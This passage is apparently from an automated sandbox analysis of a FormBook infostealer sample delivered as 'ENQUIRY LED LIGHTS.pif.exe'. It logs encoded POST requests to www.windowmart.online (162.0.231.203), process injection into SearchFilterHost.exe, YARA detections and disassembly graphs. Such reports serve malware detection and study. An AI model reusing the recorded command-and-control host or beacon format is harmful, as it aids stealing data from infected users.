                                                                                                Data Raw: 5a 74 79 50 54 6c 3d 62 6f 72 65 56 37 38 35 42 5a 69 4f 50 32 46 4a 78 6b 62 39 6b 6f 4f 50 47 64 43 42 47 33 64 70 70 6c 46 48 4e 51 54 62 37 56 65 70 76 43 30 58 36 4d 43 74 58 4d 69 31 71 6d 63 38 6f 35 43 56 7a 33 4a 48 4a 4d 4b 51 48 4d 71 33 34 4c 58 48 38 62 4e 65 4d 77 58 6d 39 33 63 43 31 55 49 67 52 45 2b 58 34 72 36 67 56 35 56 38 65 78 49 61 6e 45 62 53 4b 52 4c 43 47 74 58 72 47 76 74 68 4a 55 32 41 38 31 2b 43 62 6b 2b 79 76 67 69 38 47 6d 42 43 31 44 64 45 6e 5a 7a 38 38 49 4f 52 54 73 77 77 4e 2f 38 74 74 4d 50 63 37 31 77 6c 4d 65 79 6e 32 78 77 65 66 44 49 68 55 78 6f 4a 43 67 3d 3d
                                                                                                Data Ascii: ZtyPTl=boreV785BZiOP2FJxkb9koOPGdCBG3dpplFHNQTb7VepvC0X6MCtXMi1qmc8o5CVz3JHJMKQHMq34LXH8bNeMwXm93cC1UIgRE+X4r6gV5V8exIanEbSKRLCGtXrGvthJU2A81+Cbk+yvgi8GmBC1DdEnZz88IORTswwN/8ttMPc71wlMeyn2xwefDIhUxoJCg==
                                                                                                Nov 6, 2024 13:43:06.089951038 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Wed, 06 Nov 2024 12:43:05 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.451432162.0.231.203802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:43:08.050035000 CET798OUTPOST /uftp/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.windowmart.online
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 223
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.windowmart.online
                                                                                                Referer: http://www.windowmart.online/uftp/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Raw: 5a 74 79 50 54 6c 3d 62 6f 72 65 56 37 38 35 42 5a 69 4f 4f 57 56 4a 7a 45 6e 39 76 6f 4f 49 46 64 43 42 4d 58 64 74 70 6c 4a 48 4e 52 57 65 38 6a 4f 70 76 67 38 58 6f 4e 43 74 57 4d 69 31 69 47 64 30 6c 5a 43 6b 7a 33 56 31 4a 4a 69 51 48 4d 2b 33 34 4c 48 48 38 49 6c 64 4f 67 58 6b 77 58 63 45 37 30 49 67 52 45 2b 58 34 72 66 33 56 35 64 38 65 43 51 61 6d 68 37 52 43 78 4c 44 42 74 58 72 51 66 74 6c 4a 55 33 56 38 30 6a 70 62 6d 57 79 76 68 53 38 49 55 35 42 2f 44 64 43 6a 5a 79 79 74 35 75 62 52 64 39 2f 44 2f 6f 79 74 65 62 71 2b 7a 68 2f 64 76 54 77 6b 78 55 74 43 45 42 56 5a 79 56 41 5a 71 5a 4d 34 42 50 47 58 66 69 54 2f 66 43 71 35 71 71 33 6a 2b 6b 3d
                                                                                                Data Ascii: ZtyPTl=boreV785BZiOOWVJzEn9voOIFdCBMXdtplJHNRWe8jOpvg8XoNCtWMi1iGd0lZCkz3V1JJiQHM+34LHH8IldOgXkwXcE70IgRE+X4rf3V5d8eCQamh7RCxLDBtXrQftlJU3V80jpbmWyvhS8IU5B/DdCjZyyt5ubRd9/D/oytebq+zh/dvTwkxUtCEBVZyVAZqZM4BPGXfiT/fCq5qq3j+k=
                                                                                                Nov 6, 2024 13:43:08.713653088 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Wed, 06 Nov 2024 12:43:08 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                11192.168.2.451433162.0.231.20380
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:43:11.213046074 CET10880OUTPOST /uftp/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.windowmart.online
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 10303
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.windowmart.online
                                                                                                Referer: http://www.windowmart.online/uftp/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Raw: 5a 74 79 50 54 6c 3d 62 6f 72 65 56 37 38 35 42 5a 69 4f 4f 57 56 4a 7a 45 6e 39 76 6f 4f 49 46 64 43 42 4d 58 64 74 70 6c 4a 48 4e 52 57 65 38 6a 47 70 73 53 45 58 72 75 71 74 56 4d 69 31 6f 6d 64 31 6c 5a 43 35 7a 33 4e 78 4a 4a 76 74 48 4f 47 33 69 6f 2f 48 74 4a 6c 64 45 67 58 6b 35 33 63 46 31 55 49 50 52 45 4f 54 34 72 50 33 56 35 64 38 65 44 67 61 6c 30 62 52 50 52 4c 43 47 74 58 76 47 76 74 5a 4a 55 75 69 38 30 6e 66 62 58 32 79 76 42 43 38 45 48 42 42 7a 44 64 41 75 35 7a 76 74 35 6a 42 52 5a 64 64 44 2f 63 55 74 63 48 71 38 47 59 67 4e 66 6a 4f 2b 43 34 73 65 6e 64 4d 59 42 35 62 57 6f 35 72 35 68 62 36 4b 62 57 6c 38 4e 72 46 38 6f 58 79 32 4c 69 62 41 43 49 49 43 34 4b 61 51 6a 31 65 33 6e 35 73 30 56 59 4b 43 53 74 69 76 35 43 33 67 46 37 6c 79 5a 75 48 48 79 2f 49 79 57 61 4a 63 42 59 38 55 68 51 70 54 78 4d 76 45 35 4a 55 63 76 2f 46 56 35 4f 31 72 67 6d 33 53 46 46 5a 2f 51 70 49 41 38 32 6e 62 32 59 62 42 36 4b 74 44 49 52 33 6e 42 54 63 56 53 57 47 65 46 53 73 34 59 49 77 47 77 38 [TRUNCATED]
                                                                                                Data Ascii: ZtyPTl=boreV785BZiOOWVJzEn9voOIFdCBMXdtplJHNRWe8jGpsSEXruqtVMi1omd1lZC5z3NxJJvtHOG3io/HtJldEgXk53cF1UIPREOT4rP3V5d8eDgal0bRPRLCGtXvGvtZJUui80nfbX2yvBC8EHBBzDdAu5zvt5jBRZddD/cUtcHq8GYgNfjO+C4sendMYB5bWo5r5hb6KbWl8NrF8oXy2LibACIIC4KaQj1e3n5s0VYKCStiv5C3gF7lyZuHHy/IyWaJcBY8UhQpTxMvE5JUcv/FV5O1rgm3SFFZ/QpIA82nb2YbB6KtDIR3nBTcVSWGeFSs4YIwGw8fwa8cRFOAkhRpDZeLsRi8XI21OrgbP9Ygeq7N49Oi8qjDwwHCVsFoFHkwDqUop+n0afhtH23aUEpNobXZdFz4HxiqG/at63P36xc8O8/t+zJgRUC24b3L5iA2LV3tVxwu+E7KnFXuFY8ADPTeNIMABtGFQ3Tk51VaFuDZUnzwoPiGhwTL0OzZpk/bsZWKlsqw79nUlOGd4+LlYkPQ81h1K1g8TnCwVEBOScMGtfzUownwL2fRC8OT6CW6fjdEcZpNLO+XXY2TXz3Y/xLlLSmSkPi4VuyYDcs0YiwQ4zTDScd49js3IPpQfoF5qikFPoUVGpkUNr1sFCYbcnqgphs0R5y0d1JmIAriicVGqtVT2xs7RUSvMusXLYtabhC+BOF/S2+6wPd1/wIeUGY18vS2J+edz1dwROt/+qnyLRhTEhd9GKMA549+K3R4uLioXG/26EVUdiEgUCb1peMRfws4LsaHBZ6BlI/aTpfUh2gRC0ZtW/p2D7t4ng4sO6HIgM2tvk0jpTWb4tGcyASV6raEg6MiSMuU4K1MJAQaR4SzHHStrpPssJGxkv5SaHGsN72XCXscZTsg3bMHB2okrBROvQ0Ig6KTZmkfN/s5pfA6+JEiCYhUO4ChutAa8RaE775wvYpETWP2S/mtrYUdFBdSk64ngGUh1A9d/ [TRUNCATED]
                                                                                                Nov 6, 2024 13:43:11.881344080 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Wed, 06 Nov 2024 12:43:11 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:07:41:01
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
                                                                                                Imagebase:0x290000
                                                                                                File size:1'024'512 bytes
                                                                                                MD5 hash:120C54A53B6678586CC21F6EEFB3C3A5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:07:41:03
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
                                                                                                Imagebase:0x3b0000
                                                                                                File size:1'024'512 bytes
                                                                                                MD5 hash:120C54A53B6678586CC21F6EEFB3C3A5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:07:41:03
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
                                                                                                Imagebase:0xa60000
                                                                                                File size:1'024'512 bytes
                                                                                                MD5 hash:120C54A53B6678586CC21F6EEFB3C3A5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:7
                                                                                                Start time:07:41:29
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe"
                                                                                                Imagebase:0x1a0000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:8
                                                                                                Start time:07:41:32
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Windows\SysWOW64\SearchFilterHost.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\SysWOW64\SearchFilterHost.exe"
                                                                                                Imagebase:0x1a0000
                                                                                                File size:229'376 bytes
                                                                                                MD5 hash:1D221E674AC34BC114C91B8D56468315
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:moderate
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:9
                                                                                                Start time:07:41:59
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe"
                                                                                                Imagebase:0x1a0000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:10
                                                                                                Start time:07:42:17
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                Imagebase:0x7ff6bf500000
                                                                                                File size:676'768 bytes
                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:10.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:7%
                                                                                                  Total number of Nodes:114
                                                                                                  Total number of Limit Nodes:8
                                                                                                  execution_graph 25938 4c14040 25939 4c14082 25938->25939 25940 4c14089 25938->25940 25939->25940 25941 4c140da CallWindowProcW 25939->25941 25941->25940 26048 4c197b0 26049 4c197ea 26048->26049 26050 4c1987b 26049->26050 26054 4c19c98 26049->26054 26059 4c19ca8 26049->26059 26051 4c19871 26055 4c1a12d 26054->26055 26056 4c19cd6 26054->26056 26055->26051 26056->26055 26064 4c1a660 26056->26064 26070 4c1a670 26056->26070 26060 4c1a12d 26059->26060 26061 4c19cd6 26059->26061 26060->26051 26061->26060 26062 4c1a660 2 API calls 26061->26062 26063 4c1a670 2 API calls 26061->26063 26062->26060 26063->26060 26076 4c198c4 26064->26076 26067 4c1a697 26067->26055 26068 4c1a6af CreateIconFromResourceEx 26069 4c1a73e 26068->26069 26069->26055 26071 4c1a68a 26070->26071 26072 4c198c4 CreateIconFromResourceEx 26070->26072 26073 4c1a697 26071->26073 26074 4c1a6af CreateIconFromResourceEx 26071->26074 26072->26071 26073->26055 26075 4c1a73e 26074->26075 26075->26055 26077 4c1a6c0 CreateIconFromResourceEx 26076->26077 26078 4c1a68a 26077->26078 26078->26067 26078->26068 25942 ce4668 25943 ce467a 25942->25943 25947 ce4686 25943->25947 25948 ce4778 25943->25948 25945 ce46a5 25953 ce3e28 25947->25953 25949 ce479d 25948->25949 25957 ce4878 25949->25957 25961 ce4888 25949->25961 25954 ce3e33 25953->25954 25969 ce5c44 25954->25969 25956 ce6ff6 25956->25945 25959 ce4888 25957->25959 25958 ce498c 25958->25958 25959->25958 25965 ce44b0 25959->25965 25963 ce48af 25961->25963 25962 ce498c 25962->25962 25963->25962 25964 ce44b0 CreateActCtxA 25963->25964 25964->25962 25966 ce5918 CreateActCtxA 25965->25966 25968 ce59db 25966->25968 25970 ce5c4f 25969->25970 25973 ce5c64 25970->25973 25972 ce7165 25972->25956 25974 ce5c6f 25973->25974 25977 ce5c94 25974->25977 25976 ce7242 25976->25972 25978 ce5c9f 25977->25978 25981 ce5cc4 25978->25981 25980 ce7345 25980->25976 25982 ce5ccf 25981->25982 25984 ce864b 25982->25984 25987 ceacf9 25982->25987 25983 ce8689 25983->25980 25984->25983 25991 cecde8 25984->25991 25996 cead20 25987->25996 26000 cead30 25987->26000 25988 cead0e 25988->25984 25992 cece19 25991->25992 25993 cece3d 25992->25993 26008 cecfa8 25992->26008 26012 cecf97 25992->26012 25993->25983 25997 cead30 25996->25997 26003 ceae28 25997->26003 25998 cead3f 25998->25988 26002 ceae28 GetModuleHandleW 26000->26002 26001 cead3f 26001->25988 26002->26001 26004 ceae5c 26003->26004 26005 ceae39 26003->26005 26004->25998 26005->26004 26006 ceb060 GetModuleHandleW 26005->26006 26007 ceb08d 26006->26007 26007->25998 26009 cecfb5 26008->26009 26010 cecfef 26009->26010 26016 cebb60 26009->26016 26010->25993 26013 cecfa8 26012->26013 26014 cecfef 26013->26014 26015 cebb60 3 API calls 26013->26015 26014->25993 26015->26014 26017 cebb6b 26016->26017 26019 cedd08 26017->26019 26020 ced35c 26017->26020 26019->26019 26021 ced367 26020->26021 26022 ce5cc4 3 API calls 26021->26022 26023 cedd77 26022->26023 26027 cefaf0 26023->26027 26032 cefb08 26023->26032 26024 ceddb1 26024->26019 26028 cefafd 26027->26028 26029 cefb45 26028->26029 26030 4c109c0 CreateWindowExW CreateWindowExW 26028->26030 26031 4c109af CreateWindowExW CreateWindowExW 26028->26031 26029->26024 26030->26029 26031->26029 26034 cefb39 26032->26034 26035 cefc39 26032->26035 26033 cefb45 26033->26024 26034->26033 26036 4c109c0 CreateWindowExW CreateWindowExW 26034->26036 26037 4c109af CreateWindowExW CreateWindowExW 26034->26037 26035->26024 26036->26035 26037->26035 26038 ced0c0 26039 ced106 GetCurrentProcess 26038->26039 26041 ced158 GetCurrentThread 26039->26041 26042 ced151 26039->26042 26043 ced18e 26041->26043 26044 ced195 GetCurrentProcess 26041->26044 26042->26041 26043->26044 26047 ced1cb 26044->26047 26045 ced1f3 GetCurrentThreadId 26046 ced224 26045->26046 26047->26045 26079 ced710 DuplicateHandle 26080 ced7a6 26079->26080

                                                                                                  Executed Functions

                                                                                                  Function 04C19CA8 Relevance: 6.9, Strings: 5, Instructions: 649COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 294 4c19ca8-4c19cd0 295 4c1a1b3-4c1a21c 294->295 296 4c19cd6-4c19cdb 294->296 303 4c1a223-4c1a2ab 295->303 296->295 297 4c19ce1-4c19cfe 296->297 297->303 304 4c19d04-4c19d08 297->304 343 4c1a2b6-4c1a336 303->343 305 4c19d17-4c19d1b 304->305 306 4c19d0a-4c19d14 304->306 309 4c19d2a-4c19d31 305->309 310 4c19d1d-4c19d27 305->310 306->305 312 4c19d37-4c19d67 309->312 313 4c19e4c-4c19e51 309->313 310->309 322 4c1a536-4c1a5b6 312->322 323 4c19d6d-4c19e40 312->323 317 4c19e53-4c19e57 313->317 318 4c19e59-4c19e5e 313->318 317->318 320 4c19e60-4c19e64 317->320 321 4c19e70-4c19ea0 call 4c19898 * 3 318->321 320->322 324 4c19e6a-4c19e6d 320->324 321->343 344 4c19ea6-4c19ea9 321->344 341 4c1a5b8-4c1a5be 322->341 342 4c1a5bf-4c1a5dc 322->342 323->313 354 4c19e42 323->354 324->321 341->342 362 4c1a33d-4c1a3bf 343->362 344->343 347 4c19eaf-4c19eb1 344->347 347->343 351 4c19eb7-4c19eec 347->351 361 4c19ef2-4c19efb 351->361 351->362 354->313 364 4c19f01-4c19f5b call 4c19898 * 2 call 4c198a8 * 2 361->364 365 4c1a05e-4c1a062 361->365 366 4c1a3c7-4c1a449 362->366 408 4c19f6d 364->408 409 4c19f5d-4c19f66 364->409 365->366 367 4c1a068-4c1a06c 365->367 370 4c1a451-4c1a47e 366->370 367->370 371 4c1a072-4c1a078 367->371 385 4c1a485-4c1a505 370->385 375 4c1a07a 371->375 376 4c1a07c-4c1a0b1 371->376 382 4c1a0b8-4c1a0be 375->382 376->382 382->385 386 4c1a0c4-4c1a0cc 382->386 441 4c1a50c-4c1a52e 385->441 392 4c1a0d3-4c1a0d5 386->392 393 4c1a0ce-4c1a0d2 386->393 397 4c1a137-4c1a13d 392->397 398 